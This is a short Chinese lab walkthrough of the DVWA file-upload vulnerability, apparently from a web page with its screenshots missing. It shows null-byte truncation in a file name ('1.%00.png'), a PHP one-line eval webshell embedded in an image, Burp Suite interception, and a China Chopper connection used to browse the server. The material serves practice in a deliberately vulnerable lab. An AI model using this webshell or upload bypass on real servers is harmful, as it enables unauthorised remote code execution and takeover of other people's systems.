在kali的里面随机找一张png结尾的图片,然后重命名一下改成1.%00.png。

黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

 

改成这样的名字!!

 

然后用编辑器编辑一下!

 

在空白处写入一句话木马!!<%php @eval($_POST[pass]);?>

像这样:

 

然后保存!

 

 

 

打开burpsuit抓个包看看!!

 

 

 

 

 

可惜了,我们用了%00截断不需要改包!

 

这样就上传成功!!!

 

 

在菜刀地址上填上上路径!!再填上上密码!!!

 

 

就可以看见我的服务器里面的目录了,因为我的 7 所以罗!

 

 

然后我们进入我的服务器端看看!!

 

画红线的就是我们上传的木马!!!

胜象大百科